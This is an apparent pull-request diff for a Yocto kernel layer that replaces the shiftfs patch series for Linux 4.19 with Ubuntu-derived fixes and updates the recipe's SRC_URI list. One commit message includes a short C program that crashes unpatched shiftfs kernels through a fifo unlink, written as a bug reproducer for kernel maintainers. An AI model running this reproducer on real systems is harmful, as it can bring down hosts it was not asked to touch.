+ 		/* to mark a mount point, must root wrt lower s_user_ns */
+@@ -2031,11 +2032,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+-		sbinfo->creator_cred = prepare_creds();
+-		if (!sbinfo->creator_cred) {
++		cred_tmp = prepare_creds();
++		if (!cred_tmp) {
+ 			err = -ENOMEM;
+ 			goto out_put_path;
+ 		}
++		/* Don't override disk quota limits or use reserved space. */
++		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0022-UBUNTU-SAUCE-shiftfs-prevent-lower-dentries-from-goi.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0022-UBUNTU-SAUCE-shiftfs-prevent-lower-dentries-from-goi.patch
@@ -1,0 +1,85 @@
+From ab2997d8e72e56031ff7fcc4bde3dc1d088cb0dd Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 17 Jan 2020 16:17:06 +0100
+Subject: [PATCH 22/23] UBUNTU: SAUCE: shiftfs: prevent lower dentries from
+ going negative during unlink
+
+BugLink: https://bugs.launchpad.net/bugs/1860041
+
+All non-special files (For shiftfs this only includes fifos and - for
+this case - unix sockets - since we don't allow character and block
+devices to be created.) go through shiftfs_open() and have their dentry
+pinned through this codepath preventing it from going negative. But
+fifos don't use the shiftfs fops but rather use the pipefifo_fops which
+means they do not go through shiftfs_open() and thus don't have their
+dentry pinned that way. Thus, the lower dentries for such files can go
+negative on unlink causing segfaults. The following C program can be
+used to reproduce the crash:
+
+ #include <stdio.h>
+ #include <fcntl.h>
+ #include <unistd.h>
+ #include <sys/types.h>
+ #include <sys/stat.h>
+ #include <unistd.h>
+ #include <stdlib.h>
+
+ int main(int argc, char *argv[])
+ {
+        struct stat stat;
+
+        unlink("./bbb");
+
+        int ret = mknod("./bbb", S_IFIFO|0666, 0);
+        if (ret < 0)
+                exit(1);
+
+        int fd = open("./bbb", O_RDWR);
+        if (fd < 0)
+                exit(2);
+
+        if (unlink("./bbb"))
+                exit(4);
+
+        fstat(fd, &stat);
+
+        return 0;
+ }
+
+Similar to ecryptfs we need to dget() the lower dentry before calling
+vfs_unlink() on it and dput() it afterwards.
+
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Link: https://travis-ci.community/t/arm64-ppc64le-segfaults/6158/3
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Acked-by: Sultan Alsawaf <sultan.alsawaf@canonical.com>
+Signed-off-by: Khalid Elmously <khalid.elmously@canonical.com>
+---
+ fs/shiftfs.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 7035123689e2..c46e6003e73b 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -590,6 +590,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	int err;
+ 	const struct cred *oldcred;
+ 
++	dget(lowerd);
+ 	oldcred = shiftfs_override_creds(dentry->d_sb);
+ 	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+@@ -609,6 +610,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ 	inode_unlock(loweri);
+ 
+ 	shiftfs_copyattr(loweri, dir);
++	dput(lowerd);
+ 
+ 	return err;
+ }
+-- 
+2.20.1
+

--- a/recipes-kernel/linux/linux-vanilla/4.19/0023-shiftfs-backport-to-v4.19.patch
+++ b/recipes-kernel/linux/linux-vanilla/4.19/0023-shiftfs-backport-to-v4.19.patch
@@ -1,7 +1,7 @@
-From 311eee7f16d4a614bcc310438982540ab152ae9b Mon Sep 17 00:00:00 2001
+From 5d25e4b16009fd1a7a1d416fb6b0bfb4fb95e7fb Mon Sep 17 00:00:00 2001
 From: =?UTF-8?q?Michael=20Wei=C3=9F?= <michael.weiss@aisec.fraunhofer.de>
 Date: Thu, 9 Jan 2020 11:06:43 +0100
-Subject: [PATCH] shiftfs: backport to v4.19
+Subject: [PATCH 23/23] shiftfs: backport to v4.19
 MIME-Version: 1.0
 Content-Type: text/plain; charset=UTF-8
 Content-Transfer-Encoding: 8bit
@@ -14,7 +14,7 @@ Signed-off-by: Michael Weiß <michael.weiss@aisec.fraunhofer.de>
  1 file changed, 3 insertions(+), 22 deletions(-)
 
 diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 98c9f34ba548..d0f29b4b7aee 100644
+index c46e6003e73b..cb3c7520f353 100644
 --- a/fs/shiftfs.c
 +++ b/fs/shiftfs.c
 @@ -20,6 +20,7 @@
@@ -25,7 +25,7 @@ index 98c9f34ba548..d0f29b4b7aee 100644
  
  struct shiftfs_super_info {
  	struct vfsmount *mnt;
-@@ -1585,13 +1586,12 @@ static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
+@@ -1645,13 +1646,12 @@ static ssize_t shiftfs_copyfile(struct file *file_in, loff_t pos_in,
  
  	case SHIFTFS_CLONE:
  		ret = vfs_clone_file_range(real_in.file, pos_in, real_out.file,
@@ -41,7 +41,7 @@ index 98c9f34ba548..d0f29b4b7aee 100644
  		break;
  	}
  	revert_creds(oldcred);
-@@ -1613,24 +1613,6 @@ static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
+@@ -1673,24 +1673,6 @@ static ssize_t shiftfs_copy_file_range(struct file *file_in, loff_t pos_in,
  				SHIFTFS_COPY);
  }
  
@@ -66,7 +66,7 @@ index 98c9f34ba548..d0f29b4b7aee 100644
  static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
  {
  	const struct cred *oldcred;
-@@ -1658,7 +1640,6 @@ const struct file_operations shiftfs_file_operations = {
+@@ -1718,7 +1700,6 @@ const struct file_operations shiftfs_file_operations = {
  	.unlocked_ioctl		= shiftfs_ioctl,
  	.compat_ioctl		= shiftfs_compat_ioctl,
  	.copy_file_range	= shiftfs_copy_file_range,
@@ -75,5 +75,5 @@ index 98c9f34ba548..d0f29b4b7aee 100644
  
  const struct file_operations shiftfs_dir_operations = {
 -- 
-2.11.0
+2.20.1
 

--- a/recipes-kernel/linux/linux-vanilla_4.19.%.bbappend
+++ b/recipes-kernel/linux/linux-vanilla_4.19.%.bbappend
@@ -1,7 +1,26 @@
-SRC_URI += "file://0001-shiftfs-uid-gid-shifting-bind-mount.patch \
-            file://0002-shiftfs-rework-and-extend.patch \
-            file://0003-shiftfs-support-some-btrfs-ioctls.patch \
-            file://0004-shiftfs-backport-to-v4.19.patch \
+SRC_URI += "file://4.19/0001-shiftfs-uid-gid-shifting-bind-mount.patch \
+            file://4.19/0002-shiftfs-rework-and-extend.patch \
+            file://4.19/0003-shiftfs-support-some-btrfs-ioctls.patch \
+            file://4.19/0004-UBUNTU-SAUCE-shiftfs-use-translated-ids-when-chaning.patch \
+            file://4.19/0005-UBUNTU-SAUCE-shiftfs-fix-passing-of-attrs-to-underal.patch \
+            file://4.19/0006-UBUNTU-SAUCE-shiftfs-prevent-use-after-free-when-ver.patch \
+            file://4.19/0007-UBUNTU-SAUCE-shiftfs-use-separate-llseek-method-for-.patch \
+            file://4.19/0008-UBUNTU-SAUCE-shiftfs-lock-down-certain-superblock-fl.patch \
+            file://4.19/0009-UBUNTU-SAUCE-shiftfs-allow-changing-ro-rw-for-subvol.patch \
+            file://4.19/0010-UBUNTU-SAUCE-shiftfs-enable-overlayfs-on-shiftfs.patch \
+            file://4.19/0011-UBUNTU-SAUCE-shiftfs-add-O_DIRECT-support.patch \
+            file://4.19/0012-UBUNTU-SAUCE-shiftfs-pass-correct-point-down.patch \
+            file://4.19/0013-UBUNTU-SAUCE-Revert-UBUNTU-SAUCE-shiftfs-enable-over.patch \
+            file://4.19/0014-UBUNTU-SAUCE-shiftfs-mark-slab-objects-SLAB_RECLAIM_.patch \
+            file://4.19/0015-UBUNTU-SAUCE-shiftfs-fix-buggy-unlink-logic.patch \
+            file://4.19/0016-UBUNTU-SAUCE-shiftfs-Fix-refcount-underflow-in-btrfs.patch \
+            file://4.19/0017-UBUNTU-SAUCE-shiftfs-prevent-type-confusion.patch \
+            file://4.19/0018-UBUNTU-SAUCE-shiftfs-Correct-id-translation-for-lowe.patch \
+            file://4.19/0019-UBUNTU-SAUCE-shiftfs-Restore-vm_file-value-when-lowe.patch \
+            file://4.19/0020-UBUNTU-SAUCE-shiftfs-setup-correct-s_maxbytes-limit.patch \
+            file://4.19/0021-UBUNTU-SAUCE-shiftfs-drop-CAP_SYS_RESOURCE-from-effe.patch \
+            file://4.19/0022-UBUNTU-SAUCE-shiftfs-prevent-lower-dentries-from-goi.patch \
+            file://4.19/0023-shiftfs-backport-to-v4.19.patch \
             file://0001-shiftfs-allow-mounting-of-other-shiftfs-on-shiftfs.patch \
             "
 


### PR DESCRIPTION
This patch updates shiftfs for 4.19. It replaces the patchset extracted
from the kernel mailing list by a ported patchset from ubuntu's disco
(v5.0) kernel:

       https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/disco/
       for i in `git log --pretty=oneline disco/master -- fs/shiftfs.c| \
          awk '{print $1}'`; do echo $i >> commits-reverse; done
       for i in `tac commits-reverse`; do git cherry-pick $i; done